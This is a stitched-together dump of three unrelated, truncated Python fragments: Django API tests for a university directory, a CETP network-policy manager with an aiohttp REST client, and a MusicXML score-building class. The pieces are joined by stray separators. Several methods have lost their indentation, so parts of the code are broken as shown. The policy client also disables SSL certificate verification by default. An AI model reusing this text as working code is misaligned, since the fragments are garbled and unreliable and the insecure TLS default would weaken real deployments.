        root_unit = UnitaOrganizzativaUnitTest.create_unitaOrganizzativa(**{
            'uo': '1',
            'uo_padre': '1',
        })
        child_unit = UnitaOrganizzativaUnitTest.create_unitaOrganizzativa(**{
            'uo': '2',
            'uo_padre': '1',
        })
        teacher = PersonaleUnitTest.create_personale(**{
            'id': 1,
            'nome': 'Simone',
            'cognome': 'Mungari',
            'cd_ruolo': 'PA',
            'ds_ruolo_locale': 'aa',
            'id_ab': 1,
            'matricola': '111112',
            'fl_docente': 1,
            'flg_cessato': 0,
            'cd_uo_aff_org': root_unit,
            'cod_fis': 'SMNMNG',
            'cv_full_it': 'AAA',
            'cv_short_it': 'A',
            'cv_full_eng': 'BBB',
            'cv_short_eng': 'B',
        })
        PersonaleUnitTest.create_personale(**{
            'id': 2,
            'nome': 'Lionel',
            'cognome': 'Messi',
            'cd_ruolo': 'PO',
            'ds_ruolo_locale': 'ab',
            'id_ab': 2,
            'matricola': '111113',
            'fl_docente': 1,
            'flg_cessato': 0,
            'cd_uo_aff_org': child_unit,
        })
        DidatticaDipartimentoUnitTest.create_didatticaDipartimento(**{
            'dip_id': 1,
            'dip_cod': 1,
            'dip_des_it': "Matematica e Informatica",
            'dip_des_eng': "Math and Computer Science",
        })
        regdid = DidatticaRegolamentoUnitTest.create_didatticaRegolamento()
        course = DidatticaAttivitaFormativaUnitTest.create_didatticaAttivitaFormativa(**{
            'af_id': 1,
            'des': 'matematica',
            'af_gen_des_eng': 'math',
            'ciclo_des': 'Primo semestre',
            'regdid': regdid,
            'af_radice_id': 1,
            'anno_corso': 1,
        })
        DidatticaCoperturaUnitTest.create_didatticaCopertura(**{
            'af': course,
            'personale': teacher,
            'aa_off_id': 2019,
            'fat_part_stu_des': '111',
            'fat_part_stu_cod': 'AA',
            'part_stu_des': '11',
            'part_stu_cod': 'A',
            'tipo_fat_stu_cod': 'ALF',
            'part_ini': 'A',
            'part_fine': 'Z'
        })
        # 'EMAIL' is the only contact type whose description differs from
        # its code; it is also the one linked to actual contacts below.
        email_contact_type = PersonaleUoTipoContattoUnitTest.create_personaleUoTipoContatto(
            **{'cod_contatto': 'EMAIL', 'descr_contatto': 'Posta Elettronica', })
        # every remaining contact type uses the same string for code and
        # description, so create them all in one loop
        for contact_code in ('Riferimento Ufficio',
                             'POSTA ELETTRONICA CERTIFICATA',
                             'Posta Elettronica Privata',
                             'Fax',
                             'Telefono Residenza',
                             'Telefono Domicilio',
                             'Telefono Cellulare',
                             'Telefono Cellulare Ufficio',
                             'Telefono Ufficio',
                             'URL Sito WEB Curriculum Vitae',
                             'URL Sito WEB',
                             'Skype'):
            PersonaleUoTipoContattoUnitTest.create_personaleUoTipoContatto(**{
                'cod_contatto': contact_code,
                'descr_contatto': contact_code,
            })
        PersonaleContattiUnitTest.create_personaleContatti(**{
            'cd_tipo_cont': email_contact_type,
            'id_ab': 1,
            'contatto': 'email@email',
            'prg_priorita': 1,
            'cod_fis': teacher,
        })
        PersonaleContattiUnitTest.create_personaleContatti(**{
            'cd_tipo_cont': email_contact_type,
            'id_ab': 2,
            'contatto': 'email2@email',
            'prg_priorita': 1,
        })
        UnitaOrganizzativaFunzioniUnitTest.create_unitaOrganizzativaFunzioni(**{
            'cod_fis': teacher,
            'termine': '2222-03-26',
            'decorrenza': '1900-01-01',
            'ds_funzione': 'Direttore',
            'matricola': '111112',
        })

        url = reverse('ricerca:teacherinfo', kwargs={'teacherid': encrypt('111112')})
        # endpoint reachable
        response = client.get(url)
        assert response.status_code == 200
        # detail payload carries the (encrypted) teacher id
        response = client.get(url)
        assert decrypt(response.json()['results']['TeacherID']) == '111112'

        url = reverse('ricerca:teacherinfo', kwargs={'teacherid': encrypt('111113')})
        response = client.get(url)
        assert response.json()['results']['TeacherFirstName'] == 'Lionel'
class ApiPhdListUnitTest(TestCase):

    def test_apiphdlistunittest(self):
        """PhD-list endpoint: one PhD course, filtered several ways."""
        client = Client()

        department = DidatticaDipartimentoUnitTest.create_didatticaDipartimento(**{
            'dip_id': 1,
            'dip_cod': 1,
            'dip_des_it': "Matematica e Informatica",
            'dip_des_eng': "Math and Computer Science",
        })
        phd_cds = DidatticaDottoratoCdsUnitTest.create_didatticaDottoratoCds(**{
            'dip_cod': department,
            'cds_id_esse3': 1,
            'cds_cod': '111',
            'aa_ord_id': 1,
        })
        DidatticaDottoratoPdsUnitTest.create_didatticaDottoratoPds(**{
            'cds_id_esse3': phd_cds,
            'aa_ord': phd_cds,
            'pds_cod': 'GEN',
        })
        DidatticaDottoratoRegolamentoUnitTest.create_didatticaDottoratoRegolamento(**{
            'regdid_id_esse3': 1,
            'cds_id_esse3': phd_cds,
            'aa_ord': phd_cds,
            'aa_regdid_id': 2020,
            'num_ciclo': 10,
        })

        url = reverse('ricerca:phdlist')
        # endpoint reachable
        response = client.get(url)
        assert response.status_code == 200

        # filters that should still return the single PhD course
        for params in ({}, {'department': 1}, {'year': 2020},
                       {'regdidid': '111'}, {'pdscod': 'GEN'}):
            response = client.get(url, data=params)
            assert response.json()['results'][0]['PhdCdsCOD'] == '111'

        # year-range / cycle filters and their expected result counts
        for params, expected in (({'yearTo': 2019, 'yearFrom': 2018}, 0),
                                 ({'yearTo': 2019}, 0),
                                 ({'yearFrom': 2018}, 1),
                                 ({'cycle': 0}, 0)):
            response = client.get(url, data=params)
            assert len(response.json()['results']) == expected
class ApiDegreeTypesListUnitTest(TestCase):
    """Tests for 'ricerca:degreetypes': duplicate course types must be collapsed."""

    def test_apidegreetypeslist(self):
        client = Client()
        department = DidatticaDipartimentoUnitTest.create_didatticaDipartimento(
            dip_id=1,
        )
        # (cds_id, type code, type description); ids double as cdsord ids.
        # Note the duplicated 'L' entry: the endpoint must deduplicate it.
        course_types = [
            (1, 'L', 'Laurea'),
            (2, 'LM5', 'Laurea magistrale ciclo unico'),
            (3, 'LM', 'Laurea Magistrale'),
            (4, 'L', 'Laurea'),
        ]
        for cds_id, type_cod, type_des in course_types:
            DidatticaCdsUnitTest.create_didatticaCds(
                dip=department,
                cds_id=cds_id,
                tipo_corso_cod=type_cod,
                tipo_corso_des=type_des,
                cdsord_id=cds_id,
            )
        url = reverse('ricerca:degreetypes')
        # endpoint reachable
        response = client.get(url)
        assert response.status_code == 200
        # four courses, three distinct types, 'L' first
        response = client.get(url)
        assert response.json()['results'][0]['CourseType'] == 'L'
        assert len(response.json()['results']) == 3
class ApiDepartmentsListUnitTest(TestCase):
    """Tests for 'ricerca:departmentslist': reachability and language selection."""

    def test_apidepartmentslist(self):
        client = Client()
        DidatticaDipartimentoUnitTest.create_didatticaDipartimento(
            dip_id=1,
            dip_cod='001',
            dip_des_it='Dipartimento di Matematica e Informatica',
            dip_des_eng='Department of Math and Computer Science',
            dip_nome_breve='DEMACS',
        )
        DidatticaDipartimentoUnitTest.create_didatticaDipartimento(
            dip_id=2,
            dip_cod='002',
            dip_des_it='Dipartimento di Letteratura',
            dip_des_eng='Department of Literature',
            dip_nome_breve='LIT',
        )
        url = reverse('ricerca:departmentslist')
        # endpoint reachable
        response = client.get(url)
        assert response.status_code == 200
        # default language exposes the English name
        response = client.get(url)
        assert response.json()[
            'results'][0]['DepartmentName'] == 'Department of Literature'
        # lang=it switches to the Italian name
        response = client.get(url, data={'lang': 'it'})
        assert response.json()[
            'results'][0]['DepartmentName'] == 'Dipartimento di Letteratura'
class ApiDepartmentDetailUnitTest(TestCase):
    """Tests for 'ricerca:departmentdetail': lookup by code and language selection."""

    def test_apidepartmentdetail(self):
        client = Client()
        DidatticaDipartimentoUnitTest.create_didatticaDipartimento(
            dip_id=1,
            dip_cod='001',
            dip_des_it='Dipartimento di Matematica e Informatica',
            dip_des_eng='Department of Math and Computer Science',
            dip_nome_breve='DEMACS',
        )
        # a second department that must NOT be returned by the detail lookup
        DidatticaDipartimentoUnitTest.create_didatticaDipartimento(
            dip_id=2,
            dip_cod='002',
            dip_des_it='Dipartimento di Letteratura',
            dip_des_eng='Department of Literature',
            dip_nome_breve='LIT',
        )
        url = reverse(
            'ricerca:departmentdetail', kwargs={
                'departmentcod': '001'})
        # endpoint reachable
        response = client.get(url)
        assert response.status_code == 200
        # default language exposes the English name of department '001'
        response = client.get(url)
        assert response.json()[
            'results']['DepartmentName'] == 'Department of Math and Computer Science'
        # lang=it switches to the Italian name
        response = client.get(url, data={'lang': 'it'})
        assert response.json()[
            'results']['DepartmentName'] == 'Dipartimento di Matematica e Informatica'
class ApiAddressbookStructuresListUnitTest(TestCase):
def test_apiaddressbookstructureslist(self):
req = Client()
u1 = UnitaOrganizzativaUnitTest.create_unitaOrganizzativa(**{
'uo': '2',
'uo_padre': '1',
})
u2 = UnitaOrganizzativaUnitTest.create_unitaOrganizzativa(**{
'uo': '3',
'uo_padre': '2',
})
p1 = PersonaleUnitTest.create_personale(**{
'id': 1,
'nome': 'Simone',
'cognome': 'Mungari',
'cd_ruolo': 'PA',
'ds_ruolo_locale': 'Professore Associato',
'id_ab': 1,
'matricola': '111112',
'fl_docente': 1,
'flg_cessato': 0,
'cd_uo_aff_org': u1,
'cod_fis': 'SMN1',
'cv_full_it': 'AAA',
'cv_short_it': 'A',
'cv_full_eng': 'BBB',
'cv_short_eng': 'B',
})
p2 = PersonaleUnitTest.create_personale(**{
'id': 2,
'nome': 'Lionel',
'cognome': 'Messi',
'cd_ruolo': 'AM',
'ds_ruolo_locale': 'Amministrazione',
'id_ab': 2,
'matricola': '111113',
'fl_docente': 0,
'flg_cessato': 0,
'cd_uo_aff_org': u2,
'cod_fis': 'LNL1',
'cv_full_it': 'BBB',
'cv_short_it': 'B',
'cv_full_eng': 'AA',
'cv_short_eng': 'A',
})
PersonaleUnitTest.create_personale(**{
'id': 10,
'nome': 'Simone10',
'cognome': 'Mungari',
'cd_ruolo': 'PA',
'ds_ruolo_locale': 'Professore Associato',
'id_ab': 10,
'matricola': '111119',
'fl_docente': 1,
'flg_cessato': 0,
'cd_uo_aff_org': u1,
'cod_fis': 'SMN10',
})
PersonaleUnitTest.create_personale(**{
'id': 55,
'nome': 'Simone2',
'cognome': 'Mungari',
'cd_ruolo': 'PA',
'ds_ruolo_locale': 'Professore Associato',
'id_ab': 55,
'matricola': '111166',
'fl_docente': 1,
'flg_cessato': 0,
'cd_uo_aff_org': u2,
'cod_fis': 'SMN25',
})
PersonaleUnitTest.create_personale(**{
'id': 13,
'nome': 'Simone13',
'cognome': 'Mungari',
'cd_ruolo': 'PA',
'ds_ruolo_locale': 'Professore Associato',
'id_ab': 13,
'matricola': '1111145',
'fl_docente': 0,
'flg_cessato': 1,
'cd_uo_aff_org': u1,
'cod_fis': 'SMN13',
})
PersonaleUnitTest.create_personale(**{
'id': 4,
'nome': 'Simone4',
'cognome': 'Mungari',
'cd_ruolo': 'PA',
'ds_ruolo_locale': 'Professore Associato',
'id_ab': 4,
'matricola': '111115',
'fl_docente': 0,
'flg_cessato': 0,
'cd_uo_aff_org': u2,
'cod_fis': 'SMN4',
})
p3 = PersonaleUnitTest.create_personale(**{
'id': 3,
'nome': 'Zlatan',
'cognome': 'Ibra',
'cd_ruolo': 'PO',
'ds_ruolo_locale': 'Professore Ordinario',
'id_ab': 3,
'matricola': '111114',
'fl_docente': 1,
'flg_cessato': 0,
'cd_uo_aff_org': None,
'cod_fis': 'ZLT',
})
DidatticaDipartimentoUnitTest.create_didatticaDipartimento(**{
'dip_id': 1,
'dip_cod': 1,
'dip_des_it': | |
#!/usr/bin/python3.5
"""
BSD 3-Clause License
Copyright (c) 2019, <NAME>, Aalto University, Finland
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import asyncio
import logging
import signal
import socket
import sys
import random
import time
import traceback
import json
import ssl
import cetpManager
import C2CTransaction
import H2HTransaction
import CETPH2H
import CETPC2C
import copy
import aiohttp
LOGLEVEL_PolicyCETP = logging.INFO
LOGLEVEL_PolicyManager = logging.INFO
LOGLEVEL_RESTPolicyClient = logging.INFO
class DPConfigurations(object):
    """ To be replaced by actual Class defining the CES Network Interfaces.

    Parses RLOC (routing locator) and payload preferences out of the CES
    parameter dict and serves them to the CETP negotiation code.
    """
    def __init__(self, cesid, ces_params=None, name="Interfaces"):
        """Register RLOC and payload preferences found in *ces_params*.

        ces_params must contain 'rloc_preference' (list of CSV strings) and
        'payload_preference' (mapping payload-type -> preference value).
        """
        self.cesid = cesid
        self._rlocs_config = []         # list of (preference, order, rloc_type, address, interface_alias)
        self._payloads_config = {}      # payload-type -> preference value
        self.register_rlocs(ces_params)
        self.register_payloads(ces_params)

    def register_payloads(self, ces_params):
        """Copy the 'payload_preference' mapping from *ces_params*."""
        for payload_type, preference in ces_params["payload_preference"].items():
            self._payloads_config[payload_type] = preference

    def get_payload_preference(self, type):
        """Return the configured preference for payload *type*, or None if unknown."""
        # NOTE: parameter name 'type' shadows the builtin but is kept for interface compatibility.
        return self._payloads_config.get(type)

    def register_rlocs(self, ces_params):
        """Parse 'rloc_preference' entries of the form 'preference,order,rloc_type,address,interface_alias'."""
        for entry in ces_params["rloc_preference"]:
            preference, order, rloc_type, address, interface = entry.split(",")
            self._rlocs_config.append((int(preference), int(order), rloc_type, address, interface))

    def get_rlocs(self, rloc_type=None, iface=None):
        """Return [(preference, order, address, interface_alias)] for all RLOCs of *rloc_type*."""
        # 'iface' is accepted for interface compatibility but (as before) not used for filtering.
        return [(preference, order, address, interface)
                for preference, order, r_type, address, interface in self._rlocs_config
                if r_type == rloc_type]

    def get_registered_rlocs(self):
        """Return the full RLOC configuration list.

        Fix: the original body evaluated self._rlocs_config without returning it,
        so the method always returned None.
        """
        return self._rlocs_config

    def get_registered_payloads(self):
        """Return the payload-preference mapping.

        Fix: the original body was missing the 'return' as well.
        """
        return self._payloads_config
class PolicyManager(object):
    """Loads CES-level and host-level CETP policies from JSON files and keeps
    them indexed as PolicyCETP objects.
    """
    def __init__(self, l_cesid, cetp_host_policy_file=None, cetp_network_policy_file=None, name="PolicyManager"):
        self._cespolicy = {}        # "cespolicy:<proto>:<cesid>"       -> PolicyCETP
        self._hostpolicy = {}       # "hostpolicy:<direction>:<fqdn>"   -> PolicyCETP
        self.name = name            # fix: the 'name' parameter was previously ignored (default unchanged)
        self.l_cesid = l_cesid
        self._logger = logging.getLogger(name)
        self.cetp_host_policy_file = cetp_host_policy_file
        self.cetp_network_policy_file = cetp_network_policy_file
        self._logger.setLevel(LOGLEVEL_PolicyManager)       # Within this class, logger will only handle messages with this or higher level.
        self.load_policies()

    def load_policies(self):
        """Load both policy files. Returns True on success, False on any failure."""
        try:
            self._load_CES_policy()
            self._load_host_policy()
            return True
        except Exception as ex:
            self._logger.info("Exception in loading policies: {}".format(ex))
            return False

    def _load_CES_policy(self):
        """Parse the network policy file and index 'cespolicy' entries by 'cespolicy:<proto>:<cesid>'."""
        self._logger.info("Loading network-cetp-policies from '{}'".format(self.cetp_network_policy_file))
        with open(self.cetp_network_policy_file) as f:      # fix: the file handle was never closed
            policy_f = json.load(f)
        for policy in policy_f:
            if 'type' in policy and policy['type'] == "cespolicy":
                key = "{}:{}:{}".format(policy['type'], policy['proto'], policy['cesid'])
                self._cespolicy[key] = PolicyCETP(policy['policy'])

    def _load_host_policy(self):
        """Parse the host policy file and index 'hostpolicy' entries by 'hostpolicy:<direction>:<fqdn>'."""
        # fix: log message previously said "network-cetp-policies" for the host file too
        self._logger.info("Loading host-cetp-policies from '{}'".format(self.cetp_host_policy_file))
        with open(self.cetp_host_policy_file) as f:         # fix: the file handle was never closed
            policy_f = json.load(f)
        for policy in policy_f:
            if 'type' in policy and policy['type'] == "hostpolicy":
                key = "{}:{}:{}".format(policy['type'], policy['direction'], policy['fqdn'])
                self._hostpolicy[key] = PolicyCETP(policy['policy'])

    def _get_ces_policy(self):
        return self._cespolicy

    def _get_host_policies(self):
        # fix: attribute was misspelled 'self._hostpolicies', raising AttributeError on every call
        return self._hostpolicy

    def get_ces_policy(self, proto=None, cesid=None):
        """Return a deep copy of the CES policy for (proto, cesid), or None if missing/unspecified."""
        try:
            if proto is None or cesid is None:
                return None
            key = "cespolicy:{}:{}".format(proto, cesid)
            # deep copy so negotiation code can consume/modify TLVs without corrupting the template
            return copy.deepcopy(self._cespolicy[key])
        except Exception as ex:
            self._logger.error("Exception '{}' in loading policy for '{}'".format(ex, self.l_cesid))
            return None

    def get_host_policy(self, direction="", host_id=""):
        """Return the stored PolicyCETP for (direction, host_id), or None.

        Unlike get_ces_policy(), this returns the shared instance (no copy) —
        preserved from the original behavior.
        """
        key = "hostpolicy:{}:{}".format(direction, host_id)
        policy = self._hostpolicy.get(key)
        if policy is None:
            # the original error log sat in an unreachable except-branch; log the miss explicitly
            self._logger.error("No '{}' policy exists for host_id: '{}'".format(direction, host_id))
        return policy
# Aiohttp-based PolicyAgent in CES to retrieve CETP policies from Policy Management System
# Leveraging https://stackoverflow.com/questions/37465816/async-with-in-python-3-4
class RESTPolicyClient(object):
    """REST client that fetches host- and CES-level CETP policies from the Security
    Policy Management (SPM) system over HTTP(S).

    NOTE(review): uses pre-3.5 asyncio style (@asyncio.coroutine / yield from) and the
    long-deprecated aiohttp.Timeout context manager — works only with old aiohttp releases.
    """
    def __init__(self, network_policy_url=None, host_policy_url=None, tcp_conn_limit=1, verify_ssl=False, name="RESTPolicyClient"):
        self._loop = asyncio.get_event_loop()
        self.tcp_conn_limit = tcp_conn_limit        # max simultaneous TCP connections towards SPM
        self.verify_ssl = verify_ssl                # False by default: SPM certificate is not validated
        self.network_policy_url = network_policy_url
        self.host_policy_url = host_policy_url
        self.policy_cache = {}                      # filled via cache_policy(); not read in this class
        self._timeout = 2.0                         # default per-request timeout (seconds)
        self.name = name
        self._logger = logging.getLogger(name)
        self._logger.setLevel(LOGLEVEL_RESTPolicyClient)
        self._logger.info("Initiating RESTPolicyClient towards Policy Management System ")
        self._connect()
    def _connect(self):
        """Create the (single, reused) aiohttp client session with a bounded connector."""
        try:
            tcp_conn = aiohttp.TCPConnector(limit=self.tcp_conn_limit, loop=self._loop, verify_ssl=self.verify_ssl, keepalive_timeout=30)
            self.client_session = aiohttp.ClientSession(connector=tcp_conn)
        except Exception as ex:
            self._logger.error("Failure initiating the rest policy client")
            self._logger.error(ex)
    def close(self):
        """Close the underlying client session (and its connection pool)."""
        self.client_session.close()
    def cache_policy(self, key, policy):
        """Store a fetched policy under *key* for later reuse."""
        self.policy_cache[key] = policy
    def _adjust_host_policy_key_word(self, direction):
        """ For some strange reasons, Hassaan's developed SPM uses words 'EGRESS' in place for 'outbound', and 'INGRESS' for 'inbound' direction """
        if direction == "outbound": direction = "EGRESS"
        elif direction == "inbound": direction = "INGRESS"
        else: direction = None
        return direction
    @asyncio.coroutine
    def get_host_policy(self, host_id=None, direction=None, timeout=2.0):
        """ Initiates host-policy query towards SPM.

        Returns a PolicyCETP built from the JSON response, or None on any
        failure / missing parameter.
        """
        try:
            if self.host_policy_url is None:
                return
            if (host_id is None) or (direction is None):
                return
            direction = self._adjust_host_policy_key_word(direction)
            params = {'lfqdn': host_id, 'direction': direction}
            resp = yield from self.get(self.host_policy_url, params=params, timeout=timeout)
            # resp is the response body text (or None); json.loads(None) raises and is caught below
            json_policy = json.loads(resp)
            host_policy = PolicyCETP(json_policy)
            return host_policy
        except Exception as ex:
            self._logger.error("Exception '{}' in processing the policy response".format(ex))
            return
    @asyncio.coroutine
    def get_ces_policy(self, cesid=None, proto=None, timeout=2.0):
        """ Initiates CES-policy query towards SPM.

        Returns a PolicyCETP built from the JSON response, or None on any
        failure / missing parameter.
        """
        try:
            if self.network_policy_url is None:
                return
            if (proto is None) or (cesid is None):
                return
            params = {'ces_id': cesid, 'protocol': proto}
            resp = yield from self.get(self.network_policy_url, params=params, timeout=timeout)
            json_policy = json.loads(resp)
            ces_policy = PolicyCETP(json_policy)
            return ces_policy
        except Exception as ex:
            self._logger.error("Exception '{}' in processing the policy response".format(ex))
            return
    @asyncio.coroutine
    def get(self, url, params=None, timeout=None):
        """HTTP GET returning the response body text on 200, else None."""
        if timeout is None:
            timeout = self._timeout
        with aiohttp.Timeout(timeout):
            resp = None # To handles issues related to connectivity with url
            try:
                resp = yield from self.client_session.get(url, params=params)
                if resp.status == 200:
                    policy_response = yield from resp.text()
                    #print(policy_response)
                    return policy_response
                else:
                    return None
            except Exception as ex:
                # .close() on exception.
                if resp!=None:
                    resp.close()
                self._logger.error("Exception '{}' in getting REST policy response".format(ex))
            finally:
                if resp!=None:
                    yield from resp.release() # .release() - returns connection into free connection pool.
    @asyncio.coroutine
    def delete(self, url, timeout=None):
        """HTTP DELETE returning the response body text; re-raises on failure."""
        if timeout is None:
            timeout = self._timeout
        with aiohttp.Timeout(timeout):
            resp = yield from self.client_session.delete(url)
            try:
                return (yield from resp.text())
            except Exception as ex:
                resp.close()
                raise ex
            finally:
                yield from resp.release()
class PolicyCETP(object):
    def __init__(self, policy, name="PolicyCETP"):
        """Wrap a CETP policy dict and split it into request/offer/available sections."""
        self.policy = policy
        self._logger = logging.getLogger(name)
        self._logger.setLevel(LOGLEVEL_PolicyCETP)  # Within this class, logger will only handle message with this or higher level. (Otherwise, default value of basicConfig() will apply)
        self._initialize()
    def __copy__(self):
        """Shallow copy: the new object shares the same underlying policy dict."""
        self._logger.debug("Shallow copying the python policy object.")
        return PolicyCETP(self.policy)
    def __deepcopy__(self, memo):
        """
        To copy the policy object by value.. Deepcopy() is useful for compound objects (that contain other objects, like lists or class instances in them)
        Reference implementation: https://pymotw.com/2/copy/
        """
        self._logger.debug("Deep copying the python policy object.")
        not_there = []
        # return the already-copied instance if this object was seen before in the same deepcopy pass
        existing = memo.get(self, not_there)
        if existing is not not_there:
            return existing
        dup = PolicyCETP(copy.deepcopy(self.policy, memo))
        memo[self] = dup
        return dup
    def _initialize(self):
        """Expose the policy's sections as attributes; absent sections leave the attribute unset."""
        if "request" in self.policy:
            self.required = self.policy["request"]
        if "offer" in self.policy:
            self.offer = self.policy["offer"]
        if "available" in self.policy:
            self.available = self.policy["available"]
    # setting value for CETP can be handled in CETP transaction module
def get_available_policy(self, tlv):
ret = self.get_tlv_details(tlv)
i_ope, i_cmp, i_group, i_code, i_value = ret
found = False
for rtlv in self.available:
if rtlv["group"] == i_group and rtlv["code"]== i_code:
found = True
a_ope, a_cmp, a_group, a_code, a_value = self.get_tlv_details(rtlv)
return a_ope, a_cmp, a_group, a_code, a_value
if not found:
return None
    def get_policy_to_enforce(self, tlv):
        """Return (operator, cmp, group, code, value) of the 'request' TLV matching *tlv*'s
        group/code, or None (implicitly) when no required TLV matches."""
        # NOTE(review): this initial unpack is dead work — the values are overwritten on a
        # match and discarded on a miss; kept byte-identical nonetheless.
        ope, cmp, group, code, value = self.get_tlv_details(tlv)
        for rtlv in self.required:
            if (rtlv["group"] == tlv["group"]) and (rtlv["code"]==tlv["code"]):
                ope, cmp, group, code, value = self.get_tlv_details(rtlv)
                return ope, cmp, group, code, value
def get_tlv_details(self, tlv):
ope, cmp, | |
from lxml import etree as et
import musicscore.musicxml.elements.timewise as timewise
from musicscore.musictree.treechord import TreeChord
from musicscore.musictree.treeinstruments import TreeInstrument
from musicscore.musictree.treemeasure import TreeMeasure
from musicscore.musictree.treepagestyle import TreePageStyle
from musicscore.musictree.treepart import TreePart
from musicscore.musictree.treescorepart import TreeScorePart
from musicscore.musicxml.elements import partwise
from musicscore.musicxml.elements.barline import Barline, BarStyle
from musicscore.musicxml.elements.scoreheader import PartList, Credit, Defaults
from musicscore.musicxml.types.complextypes.appearance import LineWidth
from musicscore.musicxml.types.complextypes.credit import CreditType, CreditWords
from musicscore.musicxml.types.complextypes.defaults import Appearance, WordFont
from musicscore.musicxml.types.complextypes.encoding import Supports
from musicscore.musicxml.types.complextypes.identification import Encoding
from musicscore.musicxml.types.complextypes.scorepart import Identification
class TreeScoreTimewise(timewise.Score):
""""""
_auto_part_number = 1
    def __init__(self, *args, **kwargs):
        """Initialize an (initially empty) timewise score with a part-list and page style."""
        super().__init__(*args, **kwargs)
        self._part_list = self.add_child(PartList())
        self.version = '3.0'                    # MusicXML version attribute
        self._tuplet_line_width = None          # set via the tuplet_line_width property
        self._finished = False
        self._pre_quantized = False
        self._quantized = False
        self._post_quantized = False
        self._max_division = None               # quantization limit, see max_division property
        self._forbidden_divisions = None        # divisions quantization must avoid, see property
        self._page_style = TreePageStyle(score=self, **kwargs)
        self._accidental_mode = 'normal'        # default mode for update_accidentals()
        self._break_beam_32 = False
        self._title = None                      # CreditWords set by add_title() (and add_text())
        self._subtitle = None                   # CreditWords set by add_subtitle()
        self._composer = None                   # CreditWords set by add_composer()
        self._page_number = None                # CreditWords set by add_page_number()
        self._identifications_added = False
# private methods
def _add_identifications(self):
identification = self.add_child(Identification())
encoding = identification.add_child(Encoding())
encoding.add_child(Supports(attribute='new-page', element='print', type_='yes', value_='yes'))
encoding.add_child(Supports(attribute='new-system', element='print', type_='yes', value_='yes'))
self._identifications_added = True
def _generate_score_part(self):
id_ = 'p' + str(self._auto_part_number)
self._auto_part_number += 1
return TreeScorePart(id=id_)
    def _set_new_measure(self, measure):
        """Return *measure* unchanged, or build a fresh TreeMeasure when None is given.

        A fresh measure inherits (a copy of) the last measure's time signature; the very
        first measure of the score gets its time signature shown.
        """
        if measure is None:
            new_measure = TreeMeasure()
            measures = self.get_children_by_type(TreeMeasure)
            if measures:
                # continue with the previous time signature (copied, not shared)
                new_measure.time = measures[-1].time.__copy__()
            else:
                new_measure.time.show = True
        else:
            new_measure = measure
        return new_measure
# public properties
    @property
    def accidental_mode(self):
        """Mode used by update_accidentals(); 'normal' by default."""
        return self._accidental_mode
    @accidental_mode.setter
    def accidental_mode(self, value):
        self._accidental_mode = value
    @property
    def break_beam_32(self):
        """Whether beams are broken at 32nd-note level; strictly boolean."""
        return self._break_beam_32
    @break_beam_32.setter
    def break_beam_32(self, value):
        if not isinstance(value, bool):
            raise TypeError(f'Score().break_beam_32 {value} must be boolean.')
        self._break_beam_32 = value
    @property
    def composer(self):
        """CreditWords element created by add_composer(), or None before that."""
        return self._composer
    @property
    def defaults(self):
        """The score's Defaults child, or None if none has been added yet."""
        try:
            return self.get_children_by_type(Defaults)[0]
        except IndexError:
            return None
@property
def forbidden_divisions(self):
return self._forbidden_divisions
@forbidden_divisions.setter
def forbidden_divisions(self, value):
if value is not None:
for x in value:
if not isinstance(x, int):
raise TypeError('forbidden_division must be of type int not{}'.format(type(value)))
self._forbidden_divisions = value
def make_defaults(self):
if self.defaults is None:
self.add_child(Defaults())
else:
raise Exception('defaults already exists')
    @property
    def max_division(self):
        """Upper bound for quantization divisions; None means unlimited."""
        return self._max_division
    @max_division.setter
    def max_division(self, value):
        if value is not None and not isinstance(value, int):
            raise TypeError('max_division.value must be None or of type int not {}'.format(type(value)))
        self._max_division = value
    @property
    def number_of_parts(self):
        """Number of TreeScorePart children registered in the part-list."""
        return len(self._part_list.get_children_by_type(TreeScorePart))
    @property
    def page_style(self):
        """The TreePageStyle created for this score at construction time."""
        return self._page_style
    @property
    def subtitle(self):
        """CreditWords element created by add_subtitle(), or None before that."""
        return self._subtitle
    @property
    def title(self):
        """CreditWords element created by add_title() (or add_text()), or None."""
        return self._title
    @property
    def tuplet_line_width(self):
        """Line width (float) of tuplet brackets; setting it also updates the Defaults/Appearance tree."""
        return self._tuplet_line_width
    @tuplet_line_width.setter
    def tuplet_line_width(self, val):
        if not isinstance(val, float):
            raise TypeError('tuplet_line_width.value must be of type float not{}'.format(type(val)))
        self._tuplet_line_width = val
        # ensure a Defaults -> Appearance -> LineWidth(type='tuplet bracket') chain exists,
        # reusing each level if already present, then store the value there
        if self.defaults is None:
            self.make_defaults()
        try:
            appearance = self.defaults.get_children_by_type(Appearance)[0]
        except IndexError:
            appearance = self.defaults.add_child(Appearance())
        try:
            line_width = [lw for lw in appearance.get_children_by_type(LineWidth) if lw.type == 'tuplet bracket'][0]
        except IndexError:
            line_width = appearance.add_child(LineWidth(type='tuplet bracket'))
        line_width.value = val
    @property
    def word_font(self):
        """First WordFont child of defaults, or None when defaults or the font is absent."""
        try:
            return self.defaults.get_children_by_type(WordFont)[0]
        except (AttributeError, IndexError):
            # AttributeError: no defaults yet (self.defaults is None); IndexError: no WordFont child
            return None
# public methods
# add
def add_beats(self, list_of_beats=None):
for measure in self.get_children_by_type(TreeMeasure):
for part in measure.get_children_by_type(TreePart):
part.add_beats(list_of_beats)
